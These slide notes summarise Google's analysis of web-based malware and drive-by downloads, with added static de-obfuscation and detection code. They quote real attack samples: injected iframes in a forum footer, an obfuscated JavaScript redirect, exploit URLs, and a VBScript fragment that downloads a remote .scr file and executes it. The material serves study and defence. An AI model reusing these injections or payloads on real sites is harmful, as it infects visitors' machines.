Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu, Google, Inc.

Post on 29-Dec-2015


The Ghost In The Browser: Analysis of Web-based Malware

Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu, Google, Inc.

Preface

Google's existing large volume of data

Google versus Microsoft

Introduction

This paper describes a new trend: delivering exploits through web-based means.

Unlike traditional botnets that use push-based infection, web-based malware infection follows a pull-based model, creating botnet-like structures.

Data was collected over a 12-month period starting in March 2006.

Related Works

Alex Moshchuk: http://research.microsoft.com/en-us/people/alexmos/

He showed a decrease in drive-by-downloads over time.

Little data.

Related Works

HoneyMonkey: finer-grained, focused on case-specific vulnerabilities. http://research.microsoft.com/en-us/um/people/ymwang/

Definition of Malicious of This Paper

A web page is deemed malicious, if it causes the automatic installation of software without the user’s knowledge or consent.

Detecting Dangerous Web Pages

Does not attempt to investigate the actual behavior of the installed software, but rather identifies the mechanisms used to introduce the software into the system via the browser.

Detection architecture

MapReduce

Use MapReduce to process a large number of URLs and all links to potential exploit URLs.

The output is the set of malware URLs (pages).

Monitor and Analysis

1. New processes being started.
2. Registry and file system changes.

Assign a score to each recorded component using different anti-virus engines, and sum all scores into a total score. This is the rough approach; the paper does not give the details.

Peak performance: 300,000 URLs

Total: 4.5 million URLs; 450,000 URLs were engaging in drive-by-downloads. About 10% of the URLs were malicious.

Inject malicious content on popular web sites

Four mechanisms: web server security, user contributed content, advertising, third-party widgets

Web Server Security

Scripting applications (web packages, modules): phpBB2, Invision Board

Invision Power Board

<!-- Copyright Information -->
<div align='center' class='copyright'>Powered by <a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final &copy; 2003 &nbsp;<a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>

<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>

User Contributed Content

Sites that permit posts and allow users to insert arbitrary HTML (pages where visitors can leave comments containing HTML), including <iframe> and <script> tags.

Even where HTML support is limited, …

<SCRIPT language=JavaScript>
function otqzyu(nemz){
juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="('";awq27="";sftfttft=4;
fghdh="'ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om'";
dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);
je15="')";
if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);
}
otqzyu();//</SCRIPT>

De-obfuscating

location.replace('http://videozfree.com')
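As an added example (not from the paper or these slides), the de-obfuscation step above can be done statically: collect the string constants, resolve each eval() argument by concatenation, and never execute the script. The input is the statement list of the obfuscated script quoted above; no other names are assumed.

```javascript
// Added example (not from the paper): statically resolve the "split
// string constants + eval" obfuscation quoted above without running it.
// Input: the statements of that script (the <SCRIPT> tags and function
// wrapper removed, the line-wrapped constant vbb25="('" rejoined).
// The guard vj20+sftfttft==6 is 2+4==6, always true; it only exists to
// look like real logic.
const OBFUSCATED = `juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="('";awq27="";sftfttft=4;fghdh="'ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om'";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="')";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);`;

const QUOTED = /^(["'])(.*)\1$/;                       // bare string literal
const ASSIGN_LIT = /^(\w+)\s*=\s*(["'])(.*)\2$/;        // name="text"
const EVAL_CALL = /^(?:(\w+)\s*=\s*)?(?:if\s*\(.*?\)\s*)?eval\((.*)\)$/;

// Join a "+"-separated expression of identifiers and literals from the
// constant table; null if any piece is not a known string constant.
function resolveConcat(expr, consts) {
  let out = "";
  for (const raw of expr.split("+")) {
    const piece = raw.trim();
    const lit = piece.match(QUOTED);
    if (lit) { out += lit[2]; continue; }
    if (!(piece in consts)) return null;
    out += consts[piece];
  }
  return out;
}

// Walk statements in order: string assignments fill the constant table;
// each eval(...) has its argument resolved and recorded as the code it
// would have run. If the result is assigned and is itself a quoted
// literal (dh4 here), store the unquoted text, which is what eval of a
// string literal returns, so later statements can reference it.
function deobfuscate(src) {
  const consts = Object.create(null);
  const evals = [];
  for (const stmt of src.split(";").map((s) => s.trim())) {
    let m;
    if ((m = stmt.match(ASSIGN_LIT))) { consts[m[1]] = m[3]; continue; }
    if ((m = stmt.match(EVAL_CALL))) {
      const code = resolveConcat(m[2], consts);
      if (code === null) continue;                // piece we cannot resolve
      evals.push(code);
      const asLit = code.match(QUOTED);
      if (m[1] && asLit) consts[m[1]] = asLit[2];
    }
  }
  return { consts, evals };                       // evals[1] is the redirect
}
```

The last recorded eval is the hidden `location.replace('http://videozfree.com')`, recovered without ever giving the script a chance to run.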

Advertising

Rented advertising space.

Third-Party Widgets

Hit counters. Another example: iframemoney.org

Example

<!-- Begin Stat Basic code -->
<script language="JavaScript" src="http://m1.stat.xx/basic.js"></script>
<script language="JavaScript"><!--
statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);
// --></script>
<noscript><a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA"><img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA" border="0" nosave width="18" height="18"></a></noscript>
<!-- End Stat Basic code -->

d.write("<scr"+"ipt language='JavaScript' type='text/javascript' src='http://m1.stats4u.yy/md.js?country=us&id="+ id +"&_t="+(new Date()).getTime()+"'></scr"+"ipt>")

Trigger another exploit code

http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe

Microsoft Security Bulletin MS03-011: A flaw in Microsoft VM Could Enable System Compromise.

Exploitation Mechanisms

An adversary first needs to gain control over a user's system. The traditional approach: finding vulnerable network services and remotely exploiting them, which NAT and firewalls now limit.

Now: lure users to connect to malicious servers.

Because the traditional approach is constrained, attackers use web servers (web pages) and drive-by downloads instead.

Once a vulnerability has been discovered, an adversary can choose an appropriate exploit and ask the web browser to download it.

Exploiting Software

Targets: the browser itself, or external programs launched by the browser. The goal is to download, store and then execute a malware binary (drive-by download).

Microsoft’s Data Access Components

http://www.microsoft.com/taiwan/technet/security/bulletin/ms06-014.mspx

JavaScript can reliably accomplish this. Analyzing this kind of attack is harder, for example when the payload can be downloaded only once and later requests return nothing.

Example

The following example illustrates the steps taken by an adversary to leverage this vulnerability into remote code execution:

• The exploit is delivered to a user's browser via an iframe on a compromised web page.
• The iframe contains Javascript to instantiate an ActiveX object that is not normally safe for scripting.
• The Javascript makes an XMLHTTP request to retrieve an executable.
• Adodb.stream is used to write the executable to disk.
• A Shell.Application is used to launch the newly written executable.

A twenty line Javascript can reliably accomplish this sequence of steps to launch any binary on a vulnerable installation.

WebViewFolderIcon

Heap spraying. Code here: http://forum.eviloctal.com/archiver/tid-25077.html

Use JavaScript to catalog the browser (IE or Firefox), and also the JVM version and the OS patch level.

EX: http://blog.yam.com/visioncan/article/10598530

<script>
window.env = new function() {
    this.isOpera = (window.opera && navigator.userAgent.match(/opera/gi)) ? true : false;
    this.isIE = (!this.isOpera && document.all && navigator.userAgent.match(/msie/gi)) ? true : false;
    this.isSafari = (!this.isIE && navigator.userAgent.match(/safari/gi)) ? true : false;
    this.isGecko = (!this.isIE && navigator.userAgent.match(/gecko/gi)) ? true : false;
    this.isFirefox = (!this.isIE && navigator.userAgent.match(/firefox/gi)) ? true : false;
};
//=====================
var s = "";
for (var i in env) {
    s += i + " : " + env[i] + "\n";
}
alert(s);
</script>

EX: http://demo.tc/Post/366

<script type="text/javascript">
var isIE = navigator.userAgent.search("MSIE") > -1;
var isIE7 = navigator.userAgent.search("MSIE 7") > -1;
var isFirefox = navigator.userAgent.search("Firefox") > -1;
var isOpera = navigator.userAgent.search("Opera") > -1;
var isSafari = navigator.userAgent.search("Safari") > -1; // Google's browser (Chrome) uses this engine
if (isIE7) { alert('isIE7'); }
if (isIE) { alert('isIE'); }
if (isFirefox) { alert('isFirefox'); }
if (isOpera) { alert('isOpera'); }
if (isSafari) { alert('isSafari'); }
</script>

JVM EX: http://forums.sun.com/thread.jspa?threadID=547717

alert("javaEnabled " + window.navigator.javaEnabled());
alert("java version " + java.lang.System.getProperty("java.version"));

Tricking the User

Tricking the user into downloading and running the software.

For example, posing as a codec (decoder).

Obfuscation

Tutorial: http://anti-hacker.blogspot.com/2008/02/javascript7.html

Obfuscated JavaScript of this kind can evade detection. However, some reputable websites also use obfuscation, so treating obfuscation alone as a malicious signal produces false positives.

Example

document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o...%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>
-------------------------------------------------------------------------------------
<SCRIPT LANGUAGE="Javascript"><!--
/* criptografado pelo Fal - [...]
document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20...D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));//--></SCRIPT>

<script language="VBScript">
on error resume next
dl = "http://foto02122006.xxx.ru/foto.scr"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
...
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

Malware Classification

Classified with anti-virus software into 3 categories. Trojan: installed through the usual methods. Adware: software that displays advertisements. Unknown/Obfuscated: could not be determined.

200,000 unique malware binaries. Two binaries are assumed to be different if their cryptographic digests (hashes) differ. Why this method of telling binaries apart?
▪ Classifying by structural similarities or by the exploit they use is expensive.
▪ No readily available tools.

[Table: Malware family, Percentage]

Malware Analysis

Adware and Trojans are the most prevalent malware categories

For adware, Trymedia and NewDotNet are the most common providers.

For Trojans, Trojan downloaders and banking Trojans are the most common.

Trymedia

Trymedia is an adware that infects your computer through peer-to-peer networks, shareware programs and some websites.

It monitors your surfing activity, especially your shopping and banking habits, collects this information and sends it to the Trymedia server.

Based on this information your computer is bombarded with ad pop-ups.

NewDotNet

It tracks what websites a person visits and then pops up separate browser windows with targeted advertisements and special offers.

It continuously downloads updated information about new offers and collects a variety of information.

http://blog.xuite.net/reptile/diary/4539739

Trojan downloader

Usually a bootstrap to download other arbitrary binaries onto a machine.

Banking Trojans

Steal sensitive information such as bank account numbers and corresponding passwords.

The extracted information is often sent back to the adversary via throw-away email accounts.

With unique URLs

Trojans are the most numerous: over 300,000.

Manual inspection of HTTP requests not issued by the browser. Majority:
▪ Pop-up ads
▪ Rank inflation

Some cases:
▪ Receive binary updates and instructions
▪ Where the anti-virus engines provided a classification, the binaries were labeled either as Trojan or Worm.

Remotely Linked Exploits

The majority of the exploits were hosted on third-party servers and not on the compromised web sites.

The attacker had managed to compromise the web site content to point towards an external URL hosting the exploit either via iframes or external JavaScript.

Or, less popular, completely redirect to another malicious site.
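An added example (not the paper's code) of the pre-filter implied by the detection architecture and by this section: scan a page's HTML for iframes and external scripts whose src points off-site, the pattern seen in the Invision Power Board footer above. The sample HTML is constructed here from that footer, with example.com standing in for the compromised site.

```javascript
// Added example, not from the paper: flag iframes and scripts that load
// content from a host other than the page's own, and note whether the
// element is sized or styled to be invisible, the usual way injected
// iframes are hidden. SAMPLE_HTML is constructed from the Invision Power
// Board footer quoted on this page; example.com is the assumed site host.
const SAMPLE_HTML = `<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final
&copy; 2003 &nbsp;<a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div>
<script src="/js/forum.js"></script>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193' width=0 height=0></iframe>`;

const TAG_RE = /<(iframe|script)\b([^>]*)>/gi;
const ATTR_RE = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Parse a tag's attribute text into a lower-cased key/value map; handles
// double-quoted, single-quoted and unquoted values.
function parseAttrs(text) {
  const attrs = {};
  for (const m of text.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Return every iframe/script whose src resolves to a host other than the
// page's own. Same-site resources and inline scripts are not reported.
function findRemoteLoaders(html, pageUrl) {
  const own = new URL(pageUrl).hostname;
  const hits = [];
  for (const m of html.matchAll(TAG_RE)) {
    const attrs = parseAttrs(m[2]);
    if (!attrs.src) continue;                        // inline script
    let u;
    try { u = new URL(attrs.src, pageUrl); } catch { continue; }
    if (u.hostname === own) continue;                // same-site resource
    const hidden = attrs.width === "0" || attrs.height === "0" ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || "");
    hits.push({ tag: m[1].toLowerCase(), host: u.hostname, src: u.href, hidden });
  }
  return hits;
}
```

Each hit is a candidate exploit URL for the verification stage; the remote hosts found this way across many pages are exactly the aggregation points the section below describes.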

[Figure: Number of sites pointing to exploit URLs]

The reasons (advantages of remotely linked exploits):

1. Ease of management.
2. Having many sites point to a single site offers an aggregation point to monitor and generate statistics.
3. Able to update the portfolio of exploits by just changing a single web page.

Traffic splitting…

Malware evolution

To avoid detection by anti-virus software, the fastest-changing binaries are updated (changed) roughly once per hour.

Discussion

We expect that the majority of malware is no longer spreading via remote exploitation but rather as we indicated in this paper via web-based infection.

This rationale can be motivated by the fact that the computer of an average user provides a richer environment for adversaries to mine, for example, it is more likely to find banking transactions and credit card numbers on a user’s machine than on a compromised server.

Conclusion

1. Identified the four prevalent mechanisms used to inject malicious content on popular web sites.

2. Found a large number of malicious web pages responsible for malware infections, and found evidence that web-based malware creates botnet-like structures in which compromised machines query web servers periodically for instructions and updates.

3. Malware binaries change frequently.

4. To achieve better exposure and more reliability, malware binaries are often distributed across a large number of URLs and domains.
